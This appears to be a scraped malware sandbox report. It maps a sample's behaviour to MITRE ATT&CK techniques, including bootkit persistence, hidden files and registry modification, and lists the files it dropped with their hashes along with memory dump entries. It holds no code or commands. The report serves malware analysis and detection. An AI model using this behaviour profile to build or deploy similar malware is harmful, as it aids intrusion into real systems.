MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Pre-OS Boot

T1542

Bootkit

T1542.003

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Pre-OS Boot

T1542

Bootkit

T1542.003

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Killme.vbs

Filesize
218B

MD5
0639fba03ab54443ada1891bd2e2c7b3

SHA1
ab688409e35f4b7aeba68eaf83fa10fbcb590cd2

SHA256
6620568a36d6a0d43cd64933c87dc362cb950bc0f0e71b7e8b3244ec243c2aad

SHA512
697b7b2301bc00b31ef8ebc0f9917a0d80a9caffb1a3f5c87726c8c0297b991e2c4711e11d8bbab59586958d8f577b035cd97e7406f804b959eeea28db360acc

Download Submit
C:\Program Files\1_shfnlpbag.qbhxe

Filesize
48KB

MD5
7cd98f76cdd082fcfb184c5ba13e8924

SHA1
2132ca945b5eee11086a4afb75bb2a519f372928

SHA256
0ca3c6e9120abcb1fba6caed17338c3be7e96cfab493599c4d70801a3d06fe11

SHA512
f66711fd326d475874982471bdfa71ceeede9f08a81f9cc4471ee625638669bdad548501cf16e15e65f52f7f3f21890c1d7cd8378acdfa0544867209c5df7fb3

Download Submit
C:\Program Files\Common Files\tk.reg

Filesize
2KB

MD5
2642e9ec1a2da48dc43e758e78578792

SHA1
6efc1df849ddace7b9b39d5b759b3ae6239c5c71

SHA256
4c87ff7a1aa997628668acabfd90366f771644fed84286dbaa1089873ecd3ca8

SHA512
2befd851400c6192f05ac51726130d4cb200cacbdec26f50369e2254e70f39c1922f7ad789234fbdf15046534505778f8d2fab74e92e114b69bb5c27fadd04bc

Download Submit
C:\Program Files\pack.wsf

Filesize
8KB

MD5
a83fdf4f29a7e978d33eeb3674df531b

SHA1
60ea7b41816bc2044a6224e38352e56667d3d5ed

SHA256
f85f16fb946e6b4d7ef4f6523276a52b4a68d04bdf340312adc2ccdef4cee845

SHA512
7ad293f3032054c7e55e89a558dde1e4465c31c1c9fd612e3f56fc209b40826af5273fe140273cf467a96dcda805f13844fa6244cbe2e113bfcf131117acdbd0

Download Submit
C:\Program Files\shfnlpbag.qbhxe

Filesize
37KB

MD5
3b3f4be3a987f052b40151a2361fba10

SHA1
5788ef644f22b884d0adcd12f8d9e1323abbb253

SHA256
243ba818230b31c2de80aee4e8e3920573a4eaeb67e3b8814faa06d814830d0e

SHA512
e0c5103802e58d4f17cf96ba7b7eb32032de678afb58b29beccfebc559b9a0b458ce76f6cd4faeb96855b9fd5ccf8755f0d375d7f8b3a67dfe4e2b23493efa3b

Download Submit
C:\SeFastInstall2_3214.exe

Filesize
260KB

MD5
0dd90d39ffe81cdb5f76ce43972279aa

SHA1
d267f9a3952111406d93ec923ea9e1042a5105f1

SHA256
ede8e12b03f88ce44ae189c905a2885f76129d9141e17878a3ab2fbc4464e4a9

SHA512
cb56bb73cc6e659a668a24bdeb4b5ce48857fc4e7eefd6c92713bc0606fea550ac23f6c6c1fda8eff7622924a4425fc1a40dc4fb36f9657d88f232a51034994f

Download Submit
C:\Windows\My.ini

Filesize
96B

MD5
9880e4958e78bd3689bb2a2f88769cf8

SHA1
e674d6683a5ee1cdc077bd858b384adb34b65070

SHA256
b3d51088833add096bdfb1ee934b2f049cb74734bc2a3a927143d6b328d12e29

SHA512
cf3358cbcca7d863b994c8e5072c83b3fcbba6410fe8bb405a7ecac99f4e4105994aae277ca802f6839a780a374d09ff9596414d39abfc4a7f3cb83e2453a2e7

Download Submit
C:\Windows\My.ini

Filesize
301B

MD5
64ffd48ac22e0d4ab15584781a08ed9e

SHA1
9ce677319f0a56011c3264936b6288e606758496

SHA256
a7ea55af6cc9231de18e8b18b4b075e485016140ecdd2002292227c735e56054

SHA512
f65082fc47d344e557130bf16033280a658b42f375f6f6c766e27f2dafb94ba6bfc6fcbfc02ec06f984a7f69c94a26196baba870a66a0fec358646762f84a581

Download Submit
C:\baidu.exe

Filesize
31KB

MD5
b507fe74c0156298e106e287c10b6fd1

SHA1
05fa8f5c6fecad42919fd5f046d3f339ceb49413

SHA256
a31fff380a15a2ffe0cb95174982d7f13b369396e1477dfe75f133d9b643b4ab

SHA512
c17cc3dccf71c05b042bba12370fd506ddcf82dcd41a23c147301c67041b2af555bf3613500b16d60ecc4cdcc57de37cca9cc425042f1a494b313588e32a883f

Download Submit
\??\c:\about blank.htm

Filesize
77B

MD5
cb2c712ef5520c3bc139c39fbee6ca86

SHA1
8a0b9c5fd8ee7a721ff82071396d8aecc948dfcf

SHA256
5fb3e9d4a2293f083e6ab2873471457e1035fa30c8cd63dff502cfde4e60f92f

SHA512
fa660297ab5bff57f2a54065c6e42ddc149420a6450efb10cd9a91d4aea46d1b8745e88193482b43f2467cd6a9c22759cfb441b55e41424058ef99bbdc98c60c

Download Submit
memory/836-17-0x0000000000E10000-0x0000000000E39000-memory.dmp

Filesize
164KB

Download
memory/836-18-0x0000000000E10000-0x0000000000E39000-memory.dmp

Filesize
164KB

Download
memory/836-21-0x00000000027D0000-0x00000000028CC000-memory.dmp

Filesize
1008KB

Download
memory/2396-54-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/2396-19-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/2396-60-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/2700-23-0x0000000000400000-0x00000000004FC000-memory.dmp

Filesize
1008KB

Download
memory/2700-55-0x0000000000400000-0x00000000004FC000-memory.dmp

Filesize
1008KB

Download
memory/2700-56-0x0000000000400000-0x00000000004FC000-memory.dmp

Filesize
1008KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads